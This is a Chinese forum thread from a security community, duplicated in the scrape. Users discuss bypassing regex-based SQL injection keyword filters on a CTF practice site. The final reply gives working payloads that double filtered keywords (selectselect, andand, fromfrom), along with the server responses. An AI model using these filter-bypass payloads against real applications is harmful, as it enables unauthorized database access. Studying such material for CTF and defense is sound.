[求助]sql注入怎样准确地探查哪些字符被过滤了？-WEB安全-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
netwind 雪币： 9731 活跃值： (3091) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 2 楼很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤 2017-5-22 23:01 0
自由的翅膀雪币： 30 活跃值： (201) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 3 楼 netwind 很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 2017-5-23 07:59 0
自由的翅膀雪币： 30 活跃值： (201) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 4 楼自由的翅膀但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 正则表达式能匹配到select，那么//select//应该也能匹配到的吧........ 2017-5-23 08:00 0
netwind 雪币： 9731 活跃值： (3091) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼你研究一下正则表达式就明白了 2017-5-23 13:37 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 6 楼刚刚在另外一个哥们儿那里贴了这个攻略，不过不算是自己绕过的。实际上将被过滤的关键字改成selectselect （注意空格）也是可以成功的使用1' and 1=1 or ''=' 返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 or ''=''' at line 1。因为and被过滤掉使用1' andand%20%201=1 or''=' 返回 ID: 1' and 1=1 or''=' name: baloteli ID: 1' and 1=1 or''=' name: kanawaluo ID: 1' and 1=1 or''=' name: dengdeng 这里将空格写成%20是为了明显的显示出来需要两个空格 http://ctf5.shiyanbar.com/423/web/?id=' or exists (selectselect * fromfrom admin) andand ''=' 2017-5-24 11:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
netwind 雪币： 9731 活跃值： (3091) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 2 楼很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤 2017-5-22 23:01 0
自由的翅膀雪币： 30 活跃值： (201) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 3 楼 netwind 很多是利用正则匹配来过滤的，绕过了正则表达式可能就绕过了过滤但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 2017-5-23 07:59 0
自由的翅膀雪币： 30 活跃值： (201) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 4 楼自由的翅膀但是我只输入select的时候，被过滤了，而//select//就没事，select都是一样出现了的啊...... 正则表达式能匹配到select，那么//select//应该也能匹配到的吧........ 2017-5-23 08:00 0
netwind 雪币： 9731 活跃值： (3091) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼你研究一下正则表达式就明白了 2017-5-23 13:37 0
hdog 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hdog 6 楼刚刚在另外一个哥们儿那里贴了这个攻略，不过不算是自己绕过的。实际上将被过滤的关键字改成selectselect （注意空格）也是可以成功的使用1' and 1=1 or ''=' 返回 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 or ''=''' at line 1。因为and被过滤掉使用1' andand%20%201=1 or''=' 返回 ID: 1' and 1=1 or''=' name: baloteli ID: 1' and 1=1 or''=' name: kanawaluo ID: 1' and 1=1 or''=' name: dengdeng 这里将空格写成%20是为了明显的显示出来需要两个空格 http://ctf5.shiyanbar.com/423/web/?id=' or exists (selectselect * fromfrom admin) andand ''=' 2017-5-24 11:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复